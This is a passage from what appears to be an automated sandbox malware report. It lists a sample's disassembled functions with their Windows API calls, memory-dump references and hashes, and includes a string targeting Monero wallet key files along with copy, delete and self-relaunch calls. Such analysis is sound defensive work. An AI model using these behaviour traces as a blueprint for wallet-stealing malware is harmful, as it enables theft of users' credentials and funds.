                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 9d73ef6f85992bd9003c7cfdf785a9855f7b30b5f4ba06dc3ca6beaa3410230c
                        • Instruction ID: 78d17fdf5dbfab976ed2e2605e8f0fde607b1b77fc10dc52d4c4743e2fd1d050
                        • Opcode Fuzzy Hash: 9d73ef6f85992bd9003c7cfdf785a9855f7b30b5f4ba06dc3ca6beaa3410230c
                        • Instruction Fuzzy Hash: 26616E71A0024DEBEB25EFA4DC95FEE77B5AF54300F008118F98A5F184EB746A06CB90
                        Function 010140B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,0189DB60,00000000,00020119,?), ref: 010140F4
                        • RegQueryValueExA.ADVAPI32(?,0189E518,00000000,00000000,00000000,000000FF), ref: 01014118
                        • RegCloseKey.ADVAPI32(?), ref: 01014122
                        • lstrcat.KERNEL32(?,00000000), ref: 01014147
                        • lstrcat.KERNEL32(?,0189E4D0), ref: 0101415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: ca7155a6982f691579d4e3be169b9fbf1cbf457d51e0169fb1254402743fb1b7
                        • Instruction ID: 49cbc515b52a47411aba1aa21fc9ffc105804554051446bad57d2a46e53bca1e
                        • Opcode Fuzzy Hash: ca7155a6982f691579d4e3be169b9fbf1cbf457d51e0169fb1254402743fb1b7
                        • Instruction Fuzzy Hash: EF41ECBAD40108ABDB24EBA0EC49FFE377DBB58300F04455CA7565B1C4EA759B888BD1
                        Function 01017E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01017E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0188C518,00000000,00020119,?), ref: 01017E5E
                        • RegQueryValueExA.ADVAPI32(?,0189DA60,00000000,00000000,000000FF,000000FF), ref: 01017E7F
                        • RegCloseKey.ADVAPI32(?), ref: 01017E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 51b6368e27e1fb139ba6cefb361eb17e71a0a58b87f7496c30068393e630ca35
                        • Instruction ID: aa5618d7422c315ae793f0e5c0df9f3fbf8b1891b934edecdada3aaabcd616cd
                        • Opcode Fuzzy Hash: 51b6368e27e1fb139ba6cefb361eb17e71a0a58b87f7496c30068393e630ca35
                        • Instruction Fuzzy Hash: A81151B5A80205EBD724CF94E949F7FBBF8FB08710F104119F606A7288D77858008BA1
                        Function 01019260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(0189E440,?,?,?,0101140C,?,0189E440,00000000), ref: 0101926C
                        • lstrcpyn.KERNEL32(0124AB88,0189E440,0189E440,?,0101140C,?,0189E440), ref: 01019290
                        • lstrlen.KERNEL32(?,?,0101140C,?,0189E440), ref: 010192A7
                        • wsprintfA.USER32 ref: 010192C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: d7df27f64175195e12e5790bbd8addb94df2812bf761519abcd737a1d099d5ca
                        • Instruction ID: 114a30ccb830fd338e500fbb3e9be5a2f448927aa5ad3d16b256ae9768aac4cd
                        • Opcode Fuzzy Hash: d7df27f64175195e12e5790bbd8addb94df2812bf761519abcd737a1d099d5ca
                        • Instruction Fuzzy Hash: AF011E75540108FFDB18DFECD998EAE7BB9FB44354F10854CF94A8B208D635AA40CB90
                        Function 010012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 010012B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 010012BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 010012D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 010012F5
                        • RegCloseKey.ADVAPI32(?), ref: 010012FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: a2bbfdc48e56a474c68cb492164cbc31cc0d7bf90590d0aa4ab587a5b29b1d8a
                        • Instruction ID: b6cbc84cb5709dd9fdaeb17e104df1fbe2042f6f2dbe96394608cd76df9de599
                        • Opcode Fuzzy Hash: a2bbfdc48e56a474c68cb492164cbc31cc0d7bf90590d0aa4ab587a5b29b1d8a
                        • Instruction Fuzzy Hash: E301E1B9A40208BBEB14DFE4E84DFAEB7BCEB48705F108159FA0697284D6759A018F50
                        Function 0101C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 3ef005eca2ca3de36b32f05c64510144f495c9ed49a14421c952d4bf96f4c0ed
                        • Instruction ID: 2cb22173df6cd459aa6aaa72d7f6b465fd66aa306fad05e0ca6fbfaafe16105e
                        • Opcode Fuzzy Hash: 3ef005eca2ca3de36b32f05c64510144f495c9ed49a14421c952d4bf96f4c0ed
                        • Instruction Fuzzy Hash: 2641187114079C5EEB218B288D88FFB7BF9AB45304F1844E8DACA86086D275DA44CF64
                        Function 01016630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 01016663
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 01016726
                        • ExitProcess.KERNEL32 ref: 01016755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 34df825bfb7b471b9b2c289f414944cbebdd6e8e30c53aafe779d4d3720344d9
                        • Instruction ID: 533f9c84a453a5469a52fb9b29b3cc1969e23c04b61e41c68b152cd6e67428a8
                        • Opcode Fuzzy Hash: 34df825bfb7b471b9b2c289f414944cbebdd6e8e30c53aafe779d4d3720344d9
                        • Instruction Fuzzy Hash: 4B312CB1D01218ABDB14EB90ED94FDEB778AF14310F404189E24A67184DF786B49CF65
                        Function 010187C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01020E28,00000000,?), ref: 0101882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01018836
                        • wsprintfA.USER32 ref: 01018850
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: c6915b84dbd423a0d644be7684df8df09c68336120c1b5c9d8b1217a583dac72
                        • Instruction ID: 7ed068446d400a0f97304ade4ddcc892169d9e203f40c55f5dea7dd3cbb112b6
                        • Opcode Fuzzy Hash: c6915b84dbd423a0d644be7684df8df09c68336120c1b5c9d8b1217a583dac72
                        • Instruction Fuzzy Hash: F82124B5A80204EFEB14DFD4ED49FAEBBB8FB48711F104119F606A7284C7799901CBA0
                        Function 01018D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0101951E,00000000), ref: 01018D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01018D62
                        • wsprintfW.USER32 ref: 01018D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: ba28e135c9027fd2bf1760f7f4903fac401af9d19f3fdc1686e054dbc00014f9
                        • Instruction ID: fe4e10204cc1e445f20e1dc32f0b467bc324b5676807ca8ee833b98f6ac35114
                        • Opcode Fuzzy Hash: ba28e135c9027fd2bf1760f7f4903fac401af9d19f3fdc1686e054dbc00014f9
                        • Instruction Fuzzy Hash: ADE0E675A80208BBD724DB94E90DE5D77B8EB44701F004155FD4A97244D9715E109B55
                        Function 0100A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 01018B60: GetSystemTime.KERNEL32(01020E1A,0189A6C0,010205AE,?,?,010013F9,?,0000001A,01020E1A,00000000,?,01899068,?,\Monero\wallet.keys,01020E17), ref: 01018B86
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0100A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 0100A3FF
                        • lstrlen.KERNEL32(00000000), ref: 0100A6BC
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 0100A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 9babb4d917ce4774a153af0055f5af6ad8f6b286c30f2d0668705e2ef0415f4f
                        • Instruction ID: dfb5d57e737c437876dab8e52a6f189fe725482806ac16a665aa3705878cd096
                        • Opcode Fuzzy Hash: 9babb4d917ce4774a153af0055f5af6ad8f6b286c30f2d0668705e2ef0415f4f
                        • Instruction Fuzzy Hash: 74E15E72A11149DBDB15FBA4ED94EEE7338AF24210F508159E45773098EF386A4ECB70
                        Function 0100D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 01018B60: GetSystemTime.KERNEL32(01020E1A,0189A6C0,010205AE,?,?,010013F9,?,0000001A,01020E1A,00000000,?,01899068,?,\Monero\wallet.keys,01020E17), ref: 01018B86
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0100D481
                        • lstrlen.KERNEL32(00000000), ref: 0100D698
                        • lstrlen.KERNEL32(00000000), ref: 0100D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0100D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
